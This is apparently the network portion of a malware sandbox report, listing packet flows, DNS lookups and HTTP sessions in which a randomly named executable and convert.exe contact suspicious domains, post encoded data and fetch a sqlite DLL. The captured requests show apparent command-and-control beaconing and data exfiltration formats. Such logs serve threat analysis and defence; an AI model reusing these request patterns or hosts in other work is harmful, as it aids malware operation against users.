                                                                                                Nov 11, 2024 10:04:35.299560070 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299561024 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299567938 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299586058 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299595118 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299602032 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299628019 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299643040 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299645901 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299657106 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299658060 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299669027 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299674034 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347455025 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347466946 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347476006 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347477913 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347484112 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347490072 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347501040 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347502947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347521067 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347538948 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347640038 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379270077 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379328012 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379333973 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379342079 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379357100 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379369020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379374981 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379381895 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379400969 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379401922 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379415035 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379426956 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379437923 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379445076 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379453897 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379463911 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379468918 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379477024 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379488945 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379513025 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379514933 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379528046 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379534006 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379544020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379556894 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379556894 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379568100 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379573107 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379580021 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379592896 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379610062 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379622936 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379626036 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379626036 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379636049 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379643917 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379647970 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379663944 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379666090 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379677057 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379682064 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379688978 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379698992 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379702091 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379713058 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379720926 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379731894 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379755020 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379870892 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:44.841485023 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.846468925 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:44.846558094 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.857294083 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.862598896 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:44.862759113 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.863142014 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:44.868014097 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:45.329088926 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:45.329193115 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:46.367800951 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:46.372739077 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.389642954 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:47.394397020 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.394490957 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:47.428039074 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:47.433037043 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.876447916 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.876717091 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:48.942078114 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:48.947057009 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.959084034 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.964157104 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.964276075 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.976736069 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.981601954 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.981666088 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.981673002 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.986462116 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.986535072 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:50.445712090 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:50.445871115 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:51.484778881 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:51.489694118 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:52.501843929 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:52.506962061 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:52.507144928 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:52.514759064 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:52.519643068 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286149025 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286170006 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286184072 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286314964 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.286390066 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:53.320908070 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:53.321027994 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:53.321995974 CET4916780192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:53.326818943 CET8049167208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.702528954 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.707581043 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.707724094 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.721899986 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.726890087 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.726902962 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:58.727087975 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:58.731983900 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.499281883 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.705775976 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:04:59.792213917 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.792229891 CET8049168206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:04:59.792359114 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:00.220662117 CET4916880192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.237656116 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.242718935 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:01.242888927 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.254463911 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:01.259361029 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306224108 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306447029 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306459904 CET8049169206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:02.306515932 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:02.309668064 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:02.768731117 CET4916980192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.782146931 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.787620068 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.787720919 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.799254894 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.804483891 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.804501057 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.804693937 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:03.809737921 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:03.809772015 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:04.599663973 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:04.797142982 CET8049170206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:04.797267914 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:05.306787014 CET4917080192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.329006910 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.334711075 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:06.334779024 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.342705011 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:06.347599983 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:07.134526968 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:07.323452950 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:07.323643923 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:07.324516058 CET4917180192.168.2.22206.238.184.166
                                                                                                Nov 11, 2024 10:05:07.329396009 CET8049171206.238.184.166192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.389244080 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.394150019 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.394274950 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.416843891 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.421821117 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.421905994 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:12.421936989 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.426733017 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:12.951385021 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:13.019412041 CET8049172209.74.64.59192.168.2.22
                                                                                                Nov 11, 2024 10:05:13.019495964 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:13.917757034 CET4917280192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:14.972870111 CET4917380192.168.2.22209.74.64.59
                                                                                                Nov 11, 2024 10:05:14.977912903 CET8049173209.74.64.59192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 11, 2024 10:03:21.499429941 CET | 192.168.2.22 | 8.8.8.8 | 0x987a | Standard query (0) | www.diced.jp | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:03:21.514652014 CET | 192.168.2.22 | 8.8.8.8 | 0xadc6 | Standard query (0) | www.diced.jp | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:28.664933920 CET | 192.168.2.22 | 8.8.8.8 | 0x5191 | Standard query (0) | www.d63dm.top | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:34.464392900 CET | 192.168.2.22 | 8.8.8.8 | 0x3338 | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:44.722887039 CET | 192.168.2.22 | 8.8.8.8 | 0xbddf | Standard query (0) | www.danceonwater.net | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:58.322182894 CET | 192.168.2.22 | 8.8.8.8 | 0x5804 | Standard query (0) | www.foshape.top | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:05:12.348911047 CET | 192.168.2.22 | 8.8.8.8 | 0x8e9a | Standard query (0) | www.swiftbyrte.xyz | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:05:26.058958054 CET | 192.168.2.22 | 8.8.8.8 | 0x93f4 | Standard query (0) | www.maryneedskidneys.info | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 11, 2024 10:03:21.506927013 CET | 8.8.8.8 | 192.168.2.22 | 0x987a | No error (0) | www.diced.jp | diced.jp | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 10:03:21.506927013 CET | 8.8.8.8 | 192.168.2.22 | 0x987a | No error (0) | diced.jp | | 153.121.40.91 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:03:21.521640062 CET | 8.8.8.8 | 192.168.2.22 | 0xadc6 | No error (0) | www.diced.jp | diced.jp | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 10:03:21.521640062 CET | 8.8.8.8 | 192.168.2.22 | 0xadc6 | No error (0) | diced.jp | | 153.121.40.91 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:28.674019098 CET | 8.8.8.8 | 192.168.2.22 | 0x5191 | No error (0) | www.d63dm.top | d63dm.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 10:04:28.674019098 CET | 8.8.8.8 | 192.168.2.22 | 0x5191 | No error (0) | d63dm.top | | 154.23.184.218 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:34.474073887 CET | 8.8.8.8 | 192.168.2.22 | 0x3338 | No error (0) | www.sqlite.org | | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:44.839288950 CET | 8.8.8.8 | 192.168.2.22 | 0xbddf | No error (0) | www.danceonwater.net | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:04:58.699074030 CET | 8.8.8.8 | 192.168.2.22 | 0x5804 | No error (0) | www.foshape.top | | 206.238.184.166 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:05:12.382644892 CET | 8.8.8.8 | 192.168.2.22 | 0x8e9a | No error (0) | www.swiftbyrte.xyz | | 209.74.64.59 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:05:26.069634914 CET | 8.8.8.8 | 192.168.2.22 | 0x93f4 | No error (0) | www.maryneedskidneys.info | maryneedskidneys.info | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 10:05:26.069634914 CET | 8.8.8.8 | 192.168.2.22 | 0x93f4 | No error (0) | maryneedskidneys.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 10:05:26.069634914 CET | 8.8.8.8 | 192.168.2.22 | 0x93f4 | No error (0) | maryneedskidneys.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false

                                                                                                • www.diced.jp
                                                                                                • www.d63dm.top
                                                                                                • www.sqlite.org
                                                                                                • www.danceonwater.net
                                                                                                • www.foshape.top
                                                                                                • www.swiftbyrte.xyz
                                                                                                • www.maryneedskidneys.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 154.23.184.218 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 10:04:28.693653107 CET | 405 | OUT | GET /5lk2/?2Z94P=LzK44tdp_JPt28wP&S6g0i61=xN5yXASnf8rfOFDMZPS3Aw0q6F9xWSQOcuF1ZBKgOvcqlR+sQpCJKI8dzMuE4/uzfZcBpIlRLxNBArokm5VkqsBLYuSwN+GZ1JVyf5BEJyjaCGsWVIC6Oje00DIX HTTP/1.1
                                                                                                Host: www.d63dm.top
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
Nov 11, 2024 10:04:29.496959925 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:04:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 138
                                                                                                Connection: close
                                                                                                ETag: "669137aa-8a"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49163 | 45.33.6.223 | 80 | 3704 | C:\Windows\SysWOW64\convert.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 10:04:34.490911961 CET | 266 | OUT | GET /2018/sqlite-dll-win32-x86-3250000.zip HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Host: www.sqlite.org
                                                                                                Connection: Keep-Alive
                                                                                                Cache-Control: no-cache
Nov 11, 2024 10:04:34.973723888 CET | 249 | IN | HTTP/1.1 200 OK
                                                                                                Connection: keep-alive
                                                                                                Date: Mon, 11 Nov 2024 09:04:34 GMT
                                                                                                Last-Modified: Tue, 18 Sep 2018 20:35:16 GMT
                                                                                                Cache-Control: max-age=120
                                                                                                ETag: "m5ba16184s74420"
                                                                                                Content-type: application/zip; charset=utf-8
                                                                                                Content-length: 476192


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49164 | 208.91.197.27 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 10:04:44.857294083 CET | 2472 | OUT | POST /bbvc/ HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.danceonwater.net
                                                                                                Referer: http://www.danceonwater.net/bbvc/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
Data Ascii: S6g0i61= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49165 | 208.91.197.27 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 10:04:47.428039074 CET | 673 | OUT | POST /bbvc/ HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.danceonwater.net
                                                                                                Referer: http://www.danceonwater.net/bbvc/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                4 | 192.168.2.22 | 49166 | 208.91.197.27 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:04:49.976736069 CET | 2472 | OUT | POST /bbvc/ HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.danceonwater.net
                                                                                                Referer: http://www.danceonwater.net/bbvc/
                                                                                                Content-Length: 3628
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:04:49.981666088 CET | 1626 | OUT


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                5 | 192.168.2.22 | 49167 | 208.91.197.27 | 80 | 2184 | C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 10:04:52.514759064 CET | 412 | OUT | GET /bbvc/?S6g0i61=AQnEtdfnecn/cJt9i/023LRQegDiN6HYsPciUFTRW5IBsDtKgzQsjW78chH883+eUHibxbeZVIJMdiRQvr4KlK/99b81DewKuJLGdX/rY9gS0DqA57O/0mcrhkmt&2Z94P=LzK44tdp_JPt28wP HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:04:53.286149025 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 11 Nov 2024 09:04:52 GMT
                                                                                                Server: Apache
                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                Set-Cookie: vsid=907vr4788614930314091; expires=Sat, 10-Nov-2029 09:04:53 GMT; Max-Age=157680000; path=/; domain=www.danceonwater.net; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_aFJzrTqZzOJ2ieM5Vdg9kjncfXjEx8N2nPImX3SfQiXAGEsSgr1X07woOsK12A7OUEuxcgBIJrws3+8z3Qtdog==
                                                                                                Content-Length: 2620
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Connection: close
